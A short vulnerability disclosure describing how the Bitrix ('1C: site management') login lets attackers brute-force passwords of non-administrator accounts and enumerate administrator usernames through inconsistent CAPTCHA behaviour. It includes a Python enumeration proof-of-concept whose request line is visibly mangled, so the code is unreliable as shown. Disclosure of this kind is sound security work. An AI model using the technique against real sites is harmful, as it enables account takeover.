User enumeration & Improper Restriction of Excessive Authentication Attempts in Bitrix

Oct 22, 2020


Vulnerability description:

There is an improper restriction of excessive authentication attempts in the latest version of the application “1C: site management”. It allows to brute passwords for accounts not in the “administrator” group. Moreover it allows to enumerate users who are in the “administrator” group.


There are 3 users in the system: admin, stag, root. User admin is the default user and he is in the “administrator” group. User stag has the same privileges as admin. User root is in all groups except the “administrator” group.

List of users
stag’s groups
root’s groups

If you send multiple times incorrect credentials for users admin and stag, the server will request you to fill the captcha. However, for user root will not request the captcha, which allows to bruteforce password. The response with length 753 means that server did not request the captcha. Response with length 802 means that server requested the captcha.

Attempts to brute the password for admin
Attempts to brute the password for stag
Attempts to brute the password for root
Successful password matching

Due to the fact that, the captcha is not required if user does not exist or isn’t in the “administrator” group we can enumerate all users in the “administrator” group. There is python script for admin enumeration:

import requests

f = open(“users.txt”,”r”)
for line in f:
for i in range(1, 5):
r =‘', data = {‘AUTH_FORM’:’Y’,’TYPE’:’AUTH’,’USER_LOGIN’:line.strip(‘\n’), ‘USER_PASSWORD’:’not_valid_pass’,’Login’:’’,’captcha_sid’:’’,’captcha_word’:’’,’sessid’:’’})
if str(r.content).find(‘CAPTCHA_CODE’) > 0:
print(“Admin found: “ + str(line))

Content of file user.txt:



Admin found: admin

Admin found: stag

